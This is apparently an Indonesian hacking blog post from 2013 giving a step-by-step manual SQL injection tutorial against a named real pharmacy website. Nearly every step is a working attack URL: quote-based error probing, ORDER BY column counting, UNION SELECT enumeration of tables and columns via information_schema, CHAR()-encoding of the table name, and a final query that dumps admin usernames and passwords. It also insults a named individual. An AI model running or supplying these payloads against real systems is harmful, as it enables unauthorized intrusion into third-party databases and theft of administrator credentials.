Selasa, 26 November 2013

SQLi Pake Jari

Target => http://www.superpharm.co.tt/test-detail.php?id=2
Rizki Ge Rizmawan Gblk !! 😂😁😂😁😁😁
kasih tanya petik satu ==> http://www.superpharm.co.tt/test-detail.php?id='2 muncul error

sekarang cari kolum nya dengan menambahkan +order+by+1--+- jadinya seperti ini ==>

(tidak error) http://www.superpharm.co.tt/test-detail.php?id=2+order+by+1--+-
(tidak error) http://www.superpharm.co.tt/test-detail.php?id=2+order+by+2--+-
(tidak error) http://www.superpharm.co.tt/test-detail.php?id=2+order+by+3--+-
(tidak error) http://www.superpharm.co.tt/test-detail.php?id=2+order+by+4--+-
(Nah ini error) http://www.superpharm.co.tt/test-detail.php?id=2+order+by+5--+-

ini menunjukan kolom nya cuma ada 4

ok lanjut sekarang mencari angka injeksi caranya dengan memberi tanda - sebelum angka id jadinya begini karena tadi ditemukan kolumnya ada 4 maka jadinya kek bgini

http://www.superpharm.co.tt/test-detail.php?id=-2+union+select+1,2,3,4--+

nah nongol tuh angka injeksi

sekarang karena angka injeksi 2 maka cara nampilin data melalui sqlnya kek begini

http://www.superpharm.co.tt/test-detail.php?id=-2+union+select+1,group_concat%28table_name%29,3,4+from+information_schema.tables+where+table_schema=database%28%29--


nah tampil tuh banyak data basenya tapi untuk menuju ke admin berbau username dan password biasanya di administrators pilih deh

caranya kek begini kaka masuk ke ==> http://www.branah.com/ascii-converter

lalu masukin administrators ==> add space == pilih yg desimal

administrators = 97 100 109 105 110 105 115 116 114 97 116 111 114 115

ok lanjut setelah itu

buat seperti ini di notepad CHAR(97, 100, 109, 105, 110, 105, 115, 116, 114, 97, 116, 111, 114, 115)



Rubah ==> database() ==> CHAR(97, 100, 109, 105, 110, 105, 115, 116, 114, 97, 116, 111, 114, 115)
Rubah ==> group_concat(table_name) ==> group_concat(column_name)
Rubah ==> information_schema.tables ==> information_schema.columns
Rubah ==> table_schema ==> table_name

jadinya seperti ini

http://www.superpharm.co.tt/test-detail.php?id=-2+union+select+1,group_concat%28column_name%29,3,4+from+information_schema.columns+where+table_name=CHAR%2897,%20100,%20109,%20105,%20110,%20105,%20115,%20116,%20114,%2097,%20116,%20111,%20114,%20115%29--+


ok setelah itu tinggal nampilin username sama passwordnya

http://www.superpharm.co.tt/test-detail.php?id=-2+union+select+1,group_concat%28user_name,0x3a,user_password%29,3,4+from+administrators